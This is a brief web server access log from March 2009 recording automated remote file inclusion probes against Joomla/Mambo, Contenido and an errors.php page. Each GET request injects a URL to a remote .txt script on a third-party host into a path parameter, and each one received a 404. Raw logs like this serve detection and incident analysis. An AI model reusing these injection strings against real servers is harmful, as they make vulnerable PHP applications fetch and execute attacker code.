202.75.4.169 - - [31/Mar/2009:14:42:42 -0500] "GET /templates/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
64.122.26.45 - - [31/Mar/2009:14:47:52 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.knoum.or.kr/bbs/icon/v4id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
64.122.26.45 - - [31/Mar/2009:14:47:53 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.knoum.or.kr/bbs/icon/v4id.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
219.85.63.226 - - [31/Mar/2009:15:01:00 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.northshoredojo.net//images/z1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
